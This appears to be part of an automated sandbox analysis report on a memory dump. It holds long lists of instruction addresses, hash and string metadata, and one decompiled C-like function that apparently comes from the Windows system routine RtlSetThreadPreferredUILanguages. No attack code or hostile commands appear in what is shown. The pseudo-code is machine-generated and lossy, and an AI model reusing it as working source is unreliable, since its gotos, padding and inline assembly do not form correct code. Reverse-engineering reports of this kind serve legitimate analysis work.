                                                                                                            0x00b45b11
                                                                                                            0x00b45b15
                                                                                                            0x00b45b17
                                                                                                            0x00000000
                                                                                                            0x00b026b8
                                                                                                            0x00b026b8
                                                                                                            0x00b026ba
                                                                                                            0x00b027a6
                                                                                                            0x00b027a6
                                                                                                            0x00b027a9
                                                                                                            0x00b027ab
                                                                                                            0x00b027b9
                                                                                                            0x00b027b9
                                                                                                            0x00b027be
                                                                                                            0x00b027c1
                                                                                                            0x00b027c3
                                                                                                            0x00b027c5
                                                                                                            0x00b027c7
                                                                                                            0x00b45c74
                                                                                                            0x00b45c79
                                                                                                            0x00b45c79
                                                                                                            0x00b027c7
                                                                                                            0x00000000
                                                                                                            0x00b026c0
                                                                                                            0x00b026c0
                                                                                                            0x00b026c3
                                                                                                            0x00b026c6
                                                                                                            0x00b026c6
                                                                                                            0x00b026c9
                                                                                                            0x00b026c9
                                                                                                            0x00000000
                                                                                                            0x00b026c9
                                                                                                            0x00b026ba
                                                                                                            0x00b0265b
                                                                                                            0x00b0265b
                                                                                                            0x00b0265e
                                                                                                            0x00b02667
                                                                                                            0x00b0266d
                                                                                                            0x00b02677
                                                                                                            0x00b0267c
                                                                                                            0x00b0267f
                                                                                                            0x00b02681
                                                                                                            0x00b45b49
                                                                                                            0x00b45b4e
                                                                                                            0x00b027cd
                                                                                                            0x00b027d0
                                                                                                            0x00b027d1
                                                                                                            0x00b027d2
                                                                                                            0x00b027d4
                                                                                                            0x00b027dd
                                                                                                            0x00b02687
                                                                                                            0x00b02687
                                                                                                            0x00b0268a
                                                                                                            0x00b0268b
                                                                                                            0x00b0268e
                                                                                                            0x00b0268f
                                                                                                            0x00b02691
                                                                                                            0x00b02696
                                                                                                            0x00b02698
                                                                                                            0x00b0269d
                                                                                                            0x00b0269f
                                                                                                            0x00000000
                                                                                                            0x00b0269f
                                                                                                            0x00b02681
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02846
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02605
                                                                                                            0x00b0260a
                                                                                                            0x00b0260c
                                                                                                            0x00b02611
                                                                                                            0x00b02616
                                                                                                            0x00b02619
                                                                                                            0x00b02619
                                                                                                            0x00b0261e
                                                                                                            0x00000000
                                                                                                            0x00b02624
                                                                                                            0x00b02627
                                                                                                            0x00b02627
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b45b1f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b02894
                                                                                                            0x00b0289b
                                                                                                            0x00b0289d
                                                                                                            0x00b028a1
                                                                                                            0x00b45b2b
                                                                                                            0x00b45b2e
                                                                                                            0x00b45b2e
                                                                                                            0x00b028a7
                                                                                                            0x00b028a9
                                                                                                            0x00b45b04
                                                                                                            0x00b45b09
                                                                                                            0x00b45b09
                                                                                                            0x00b45b09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b45b35
                                                                                                            0x00b45b3c
                                                                                                            0x00b028fb
                                                                                                            0x00b028fb
                                                                                                            0x00b026cc
                                                                                                            0x00b026cc
                                                                                                            0x00b026d0
                                                                                                            0x00000000
                                                                                                            0x00b026d2
                                                                                                            0x00b026d2
                                                                                                            0x00000000
                                                                                                            0x00b026d2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b025fe
                                                                                                            0x00b0292d
                                                                                                            0x00b0292f
                                                                                                            0x00b02930
                                                                                                            0x00b02935
                                                                                                            0x00b02939
                                                                                                            0x00b02940
                                                                                                            0x00b02945
                                                                                                            0x00b02946
                                                                                                            0x00b0294c
                                                                                                            0x00b0294e
                                                                                                            0x00b02951
                                                                                                            0x00b02951
                                                                                                            0x00b02952
                                                                                                            0x00b02958
                                                                                                            0x00b0295a
                                                                                                            0x00b02960
                                                                                                            0x00b02962
                                                                                                            0x00b02965
                                                                                                            0x00b02966
                                                                                                            0x00b0296c
                                                                                                            0x00b02971
                                                                                                            0x00b02974
                                                                                                            0x00b0297d
                                                                                                            0x00b0297e
                                                                                                            0x00b0297f
                                                                                                            0x00b02980
                                                                                                            0x00b02981
                                                                                                            0x00b02982
                                                                                                            0x00b02983
                                                                                                            0x00b02984
                                                                                                            0x00b02985
                                                                                                            0x00b02986
                                                                                                            0x00b02987
                                                                                                            0x00b02988
                                                                                                            0x00b02989
                                                                                                            0x00b0298a
                                                                                                            0x00b0298b
                                                                                                            0x00b0298c
                                                                                                            0x00b0298d
                                                                                                            0x00b0298e
                                                                                                            0x00b0298f
                                                                                                            0x00b02990
                                                                                                            0x00b02992
                                                                                                            0x00b02997
                                                                                                            0x00b029a3
                                                                                                            0x00b029a6
                                                                                                            0x00b029ab
                                                                                                            0x00b029ad
                                                                                                            0x00b029b0
                                                                                                            0x00b029b2
                                                                                                            0x00b45c80
                                                                                                            0x00b029b8
                                                                                                            0x00b029b8
                                                                                                            0x00b029bb
                                                                                                            0x00b029c0
                                                                                                            0x00b029c5
                                                                                                            0x00b029c6
                                                                                                            0x00b029c6
                                                                                                            0x00b029c9
                                                                                                            0x00b029cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b029cd
                                                                                                            0x00b029d0
                                                                                                            0x00b029d9
                                                                                                            0x00b029db
                                                                                                            0x00b029dd
                                                                                                            0x00b02a7f
                                                                                                            0x00b02a84
                                                                                                            0x00b02a87
                                                                                                            0x00b02a89
                                                                                                            0x00b45ca1
                                                                                                            0x00b45ca3
                                                                                                            0x00000000
                                                                                                            0x00b02a8f
                                                                                                            0x00b02a8f
                                                                                                            0x00000000
                                                                                                            0x00b02a8f
                                                                                                            0x00000000
                                                                                                            0x00b029e3
                                                                                                            0x00b029e3
                                                                                                            0x00b029e3
                                                                                                            0x00000000
                                                                                                            0x00b029e3
                                                                                                            0x00b029dd
                                                                                                            0x00000000
                                                                                                            0x00b029db
                                                                                                            0x00b029e6
                                                                                                            0x00b029e9
                                                                                                            0x00b029eb
                                                                                                            0x00b029ed
                                                                                                            0x00b029f3
                                                                                                            0x00b029f5
                                                                                                            0x00b029f8
                                                                                                            0x00b029fa
                                                                                                            0x00b02a97
                                                                                                            0x00b02a9a
                                                                                                            0x00b02a9d
                                                                                                            0x00b02add
                                                                                                            0x00000000
                                                                                                            0x00b02a9f
                                                                                                            0x00b02aa2
                                                                                                            0x00b02aa5
                                                                                                            0x00b02aa8
                                                                                                            0x00b02aab
                                                                                                            0x00b45cab
                                                                                                            0x00b45caf
                                                                                                            0x00b45cc5
                                                                                                            0x00b45cda
                                                                                                            0x00b45cdc
                                                                                                            0x00b45cdf
                                                                                                            0x00b45ce5
                                                                                                            0x00000000
                                                                                                            0x00b45ceb
                                                                                                            0x00b45ced
                                                                                                            0x00b45cee
                                                                                                            0x00000000
                                                                                                            0x00b45cee
                                                                                                            0x00b45cb1
                                                                                                            0x00b45cb4
                                                                                                            0x00b45cb9
                                                                                                            0x00b45cbb
                                                                                                            0x00000000
                                                                                                            0x00b45cbd
                                                                                                            0x00b45cbd
                                                                                                            0x00000000
                                                                                                            0x00b45cbd
                                                                                                            0x00b45cbb
                                                                                                            0x00b02ab1
                                                                                                            0x00b02ab1
                                                                                                            0x00b02ac4
                                                                                                            0x00b02ac6
                                                                                                            0x00b02ac6
                                                                                                            0x00000000
                                                                                                            0x00b02ac6
                                                                                                            0x00b02aab
                                                                                                            0x00000000
                                                                                                            0x00b02a00
                                                                                                            0x00b02a09
                                                                                                            0x00b02a0e
                                                                                                            0x00b02a21
                                                                                                            0x00b02a24
                                                                                                            0x00b02a35
                                                                                                            0x00b02a3a
                                                                                                            0x00b02a3d
                                                                                                            0x00b02a42
                                                                                                            0x00b02a59
                                                                                                            0x00b02a59
                                                                                                            0x00b02a5c
                                                                                                            0x00b02a5f
                                                                                                            0x00b02a5f
                                                                                                            0x00b029fa
                                                                                                            0x00b029f3
                                                                                                            0x00b02a64
                                                                                                            0x00b02a64
                                                                                                            0x00b02a6b
                                                                                                            0x00b02a6b
                                                                                                            0x00b02a6d
                                                                                                            0x00b02a72
                                                                                                            0x00b02a72
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PATH
                                                                                                            • API String ID: 0-1036084923
                                                                                                            • Opcode ID: c04cc2735b9369960a5ec1288a71f2e94d77a9b59cfb2bc1d0ccac276d2cfd47
                                                                                                            • Instruction ID: 5e020806ede5eec0b83919122cfa8f243ed9af473f8d594cbe00dac2f3bf224d
                                                                                                            • Opcode Fuzzy Hash: c04cc2735b9369960a5ec1288a71f2e94d77a9b59cfb2bc1d0ccac276d2cfd47
                                                                                                            • Instruction Fuzzy Hash: AAC1BE71E00619ABCB25DF98D885BBEBBF1FF48740F1440A9E801AB391DB34AD45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00B0FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00AEEEF0(0xbc7b60);
					_t134 =  *0xbc7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xbc7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xbc7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00AE6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00AE76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B78938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00ADB150();
													}
													_t116 = E00B76D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00AE75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xbc8638; // 0x0
																	_t122 = L00AE38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00AE76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00AE76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00B0FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00AE70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00B0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00B0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00B0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00B0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00B0FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xbc7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xbc7b84 = _t75;
						_t73 = E00AEEB70(_t134, 0xbc7b60);
						if( *0xbc7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00AEFF60( *0xbc7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                            0x00b0fab0
                                                                                                            0x00b0fab2
                                                                                                            0x00b0fab3
                                                                                                            0x00b0fab4
                                                                                                            0x00b0fabc
                                                                                                            0x00b0fac0
                                                                                                            0x00b0fb14
                                                                                                            0x00b0fb17
                                                                                                            0x00b0fac2
                                                                                                            0x00b0fac8
                                                                                                            0x00b0facd
                                                                                                            0x00b0fad3
                                                                                                            0x00b0fad3
                                                                                                            0x00b0fadd
                                                                                                            0x00b0fb18
                                                                                                            0x00b0fb1b
                                                                                                            0x00b0fb1d
                                                                                                            0x00b0fb1e
                                                                                                            0x00b0fb1f
                                                                                                            0x00b0fb20
                                                                                                            0x00b0fb21
                                                                                                            0x00b0fb22
                                                                                                            0x00b0fb23
                                                                                                            0x00b0fb24
                                                                                                            0x00b0fb25
                                                                                                            0x00b0fb26
                                                                                                            0x00b0fb27
                                                                                                            0x00b0fb28
                                                                                                            0x00b0fb29
                                                                                                            0x00b0fb2a
                                                                                                            0x00b0fb2b
                                                                                                            0x00b0fb2c
                                                                                                            0x00b0fb2d
                                                                                                            0x00b0fb2e
                                                                                                            0x00b0fb2f
                                                                                                            0x00b0fb3a
                                                                                                            0x00b0fb3b
                                                                                                            0x00b0fb3e
                                                                                                            0x00b0fb41
                                                                                                            0x00b0fb44
                                                                                                            0x00b0fb47
                                                                                                            0x00b0fb4a
                                                                                                            0x00b0fb4d
                                                                                                            0x00b0fb53
                                                                                                            0x00b4bdcb
                                                                                                            0x00b4bdcb
                                                                                                            0x00b0fb59
                                                                                                            0x00b0fb5b
                                                                                                            0x00b0fb5b
                                                                                                            0x00b0fb5e
                                                                                                            0x00b4bdd5
                                                                                                            0x00b4bdd8
                                                                                                            0x00000000
                                                                                                            0x00b4bdda
                                                                                                            0x00000000
                                                                                                            0x00b4bdda
                                                                                                            0x00b0fb64
                                                                                                            0x00b0fb64
                                                                                                            0x00b0fb64
                                                                                                            0x00b0fb67
                                                                                                            0x00b0fb6e
                                                                                                            0x00b0fb70
                                                                                                            0x00b0fb72
                                                                                                            0x00000000
                                                                                                            0x00b0fb78
                                                                                                            0x00b0fb7a
                                                                                                            0x00b0fb7a
                                                                                                            0x00b0fb7d
                                                                                                            0x00b0fb80
                                                                                                            0x00b4bddf
                                                                                                            0x00b4bde1
                                                                                                            0x00000000
                                                                                                            0x00b4bde3
                                                                                                            0x00000000
                                                                                                            0x00b4bde3
                                                                                                            0x00b0fb86
                                                                                                            0x00b0fb86
                                                                                                            0x00b0fb86
                                                                                                            0x00b0fb8b
                                                                                                            0x00b0fb90
                                                                                                            0x00b0fb92
                                                                                                            0x00b0fb94
                                                                                                            0x00b0fb9a
                                                                                                            0x00b0fb9b
                                                                                                            0x00b0fba1
                                                                                                            0x00b4bde8
                                                                                                            0x00b4bdeb
                                                                                                            0x00b4bded
                                                                                                            0x00b4beb5
                                                                                                            0x00b4beb5
                                                                                                            0x00b4bebb
                                                                                                            0x00b4bebd
                                                                                                            0x00b4bec3
                                                                                                            0x00b4bed2
                                                                                                            0x00b4bedd
                                                                                                            0x00b4bedd
                                                                                                            0x00b4beed
                                                                                                            0x00000000
                                                                                                            0x00b4bdf3
                                                                                                            0x00b4bdfe
                                                                                                            0x00b4be06
                                                                                                            0x00b4be0b
                                                                                                            0x00b4be0d
                                                                                                            0x00b4be0f
                                                                                                            0x00b4be14
                                                                                                            0x00b4be19
                                                                                                            0x00b4be20
                                                                                                            0x00b4be25
                                                                                                            0x00b4be27
                                                                                                            0x00b4be35
                                                                                                            0x00b4be39
                                                                                                            0x00b4be46
                                                                                                            0x00b4be4f
                                                                                                            0x00b4be54
                                                                                                            0x00b4be56
                                                                                                            0x00b4bef8
                                                                                                            0x00b4bef8
                                                                                                            0x00000000
                                                                                                            0x00b4be5c
                                                                                                            0x00b4be5c
                                                                                                            0x00b4be60
                                                                                                            0x00000000
                                                                                                            0x00b4be66
                                                                                                            0x00b4be66
                                                                                                            0x00b4be7f
                                                                                                            0x00b4be84
                                                                                                            0x00b4be87
                                                                                                            0x00b4be89
                                                                                                            0x00b4be8b
                                                                                                            0x00b4be99
                                                                                                            0x00b4be9d
                                                                                                            0x00b4bea0
                                                                                                            0x00b4beac
                                                                                                            0x00b4beaf
                                                                                                            0x00b4beb1
                                                                                                            0x00b4beb3
                                                                                                            0x00b4beb3
                                                                                                            0x00000000
                                                                                                            0x00b4bea2
                                                                                                            0x00b4bea2
                                                                                                            0x00000000
                                                                                                            0x00b4bea2
                                                                                                            0x00b4be8d
                                                                                                            0x00b4be8d
                                                                                                            0x00b4be92
                                                                                                            0x00000000
                                                                                                            0x00b4be92
                                                                                                            0x00b4be8b
                                                                                                            0x00b4be60
                                                                                                            0x00b4be3b
                                                                                                            0x00b4be3b
                                                                                                            0x00b4be3e
                                                                                                            0x00000000
                                                                                                            0x00b4be40
                                                                                                            0x00b4be40
                                                                                                            0x00b4be44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b4be44
                                                                                                            0x00b4be3e
                                                                                                            0x00b4be29
                                                                                                            0x00b4be29
                                                                                                            0x00000000
                                                                                                            0x00b4be29
                                                                                                            0x00b4be27
                                                                                                            0x00000000
                                                                                                            0x00b0fba7
                                                                                                            0x00b0fba7
                                                                                                            0x00b0fbab
                                                                                                            0x00b4bf02
                                                                                                            0x00b0fbb1
                                                                                                            0x00b0fbb1
                                                                                                            0x00b0fbb8
                                                                                                            0x00b0fbbd
                                                                                                            0x00b0fbbd
                                                                                                            0x00b0fbbf
                                                                                                            0x00b0fbbf
                                                                                                            0x00b0fbc5
                                                                                                            0x00b0fbcb
                                                                                                            0x00b0fbf8
                                                                                                            0x00b0fbf8
                                                                                                            0x00b0fbfa
                                                                                                            0x00000000
                                                                                                            0x00b0fc00
                                                                                                            0x00b0fc00
                                                                                                            0x00b0fc03
                                                                                                            0x00000000
                                                                                                            0x00b0fc09
                                                                                                            0x00b0fc09
                                                                                                            0x00b0fc0f
                                                                                                            0x00b0fc15
                                                                                                            0x00b0fc23
                                                                                                            0x00b0fc23
                                                                                                            0x00b0fc25
                                                                                                            0x00b0fc27
                                                                                                            0x00b0fc75
                                                                                                            0x00b0fc7c
                                                                                                            0x00b0fc84
                                                                                                            0x00000000
                                                                                                            0x00b0fc29
                                                                                                            0x00b0fc29
                                                                                                            0x00b0fc2d
                                                                                                            0x00b0fc30
                                                                                                            0x00b4bf0f
                                                                                                            0x00000000
                                                                                                            0x00b0fc36
                                                                                                            0x00b0fc38
                                                                                                            0x00b0fc3b
                                                                                                            0x00b0fc41
                                                                                                            0x00b4bf17
                                                                                                            0x00b4bf19
                                                                                                            0x00b4bf48
                                                                                                            0x00b4bf4b
                                                                                                            0x00000000
                                                                                                            0x00b4bf1b
                                                                                                            0x00b4bf22
                                                                                                            0x00b4bf24
                                                                                                            0x00b4bf26
                                                                                                            0x00000000
                                                                                                            0x00b4bf2c
                                                                                                            0x00b4bf37
                                                                                                            0x00b4bf39
                                                                                                            0x00b4bf3b
                                                                                                            0x00000000
                                                                                                            0x00b4bf41
                                                                                                            0x00b4bf41
                                                                                                            0x00b4bf41
                                                                                                            0x00b4bf41
                                                                                                            0x00b4bf45
                                                                                                            0x00000000
                                                                                                            0x00b4bf45
                                                                                                            0x00b4bf3b
                                                                                                            0x00b4bf26
                                                                                                            0x00000000
                                                                                                            0x00b0fc47
                                                                                                            0x00b0fc47
                                                                                                            0x00b0fc49
                                                                                                            0x00b0fcb2
                                                                                                            0x00b0fcb4
                                                                                                            0x00b0fcb6
                                                                                                            0x00b0fcdc
                                                                                                            0x00b0fcdc
                                                                                                            0x00000000
                                                                                                            0x00b0fcb8
                                                                                                            0x00b0fcc3
                                                                                                            0x00b0fcc5
                                                                                                            0x00b0fcc7
                                                                                                            0x00000000
                                                                                                            0x00b0fcc9
                                                                                                            0x00b0fcc9
                                                                                                            0x00b0fccd
                                                                                                            0x00000000
                                                                                                            0x00b0fccd
                                                                                                            0x00b0fcc7
                                                                                                            0x00000000
                                                                                                            0x00b0fc4b
                                                                                                            0x00b0fc4b
                                                                                                            0x00b0fc4e
                                                                                                            0x00b0fc4e
                                                                                                            0x00b0fc51
                                                                                                            0x00b0fc51
                                                                                                            0x00b0fc54
                                                                                                            0x00b0fc5a
                                                                                                            0x00b0fc5c
                                                                                                            0x00b0fc5f
                                                                                                            0x00b0fc61
                                                                                                            0x00b0fc63
                                                                                                            0x00b0fc65
                                                                                                            0x00b0fc67
                                                                                                            0x00b0fc6e
                                                                                                            0x00b0fc72
                                                                                                            0x00b0fc72
                                                                                                            0x00b0fc72
                                                                                                            0x00b0fc72
                                                                                                            0x00b0fc67
                                                                                                            0x00b0fc61
                                                                                                            0x00000000
                                                                                                            0x00b0fc5a
                                                                                                            0x00b0fc49
                                                                                                            0x00b0fc41
                                                                                                            0x00b0fc30
                                                                                                            0x00b0fc27
                                                                                                            0x00b0fc03
                                                                                                            0x00b0fbcd
                                                                                                            0x00b0fbd3
                                                                                                            0x00b0fbd9
                                                                                                            0x00b0fbdc
                                                                                                            0x00b0fbde
                                                                                                            0x00b0fc99
                                                                                                            0x00b0fc9b
                                                                                                            0x00b0fc9d
                                                                                                            0x00b0fcd5
                                                                                                            0x00b0fcd5
                                                                                                            0x00b0fc89
                                                                                                            0x00b0fc89
                                                                                                            0x00000000
                                                                                                            0x00b0fc9f
                                                                                                            0x00b0fc9f
                                                                                                            0x00b0fca3
                                                                                                            0x00000000
                                                                                                            0x00b0fca3
                                                                                                            0x00000000
                                                                                                            0x00b0fbe4
                                                                                                            0x00b0fbe4
                                                                                                            0x00b0fbe4
                                                                                                            0x00b0fbe4
                                                                                                            0x00b0fbe9
                                                                                                            0x00b0fbf2
                                                                                                            0x00000000
                                                                                                            0x00b0fbf2
                                                                                                            0x00b0fbde
                                                                                                            0x00b0fbcb
                                                                                                            0x00b0fbab
                                                                                                            0x00b0fc8b
                                                                                                            0x00b0fc8b
                                                                                                            0x00b0fc8c
                                                                                                            0x00b0fb80
                                                                                                            0x00b0fb72
                                                                                                            0x00b0fb5e
                                                                                                            0x00b0fc8d
                                                                                                            0x00b0fc91
                                                                                                            0x00b0fadf
                                                                                                            0x00b0fadf
                                                                                                            0x00b0fae1
                                                                                                            0x00b0fae4
                                                                                                            0x00b0fae7
                                                                                                            0x00b0faec
                                                                                                            0x00b0faf8
                                                                                                            0x00b0fb00
                                                                                                            0x00b0fb07
                                                                                                            0x00b0fb0f
                                                                                                            0x00b0fb0f
                                                                                                            0x00b0fb07
                                                                                                            0x00000000
                                                                                                            0x00b0faf8
                                                                                                            0x00b0fadd

                                                                                                            Strings
                                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B4BE0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                            • API String ID: 0-865735534
                                                                                                            • Opcode ID: 4b0edc1757c47c83ab21937fd515d430acf61421bb4bf026d6f80d378909b8be
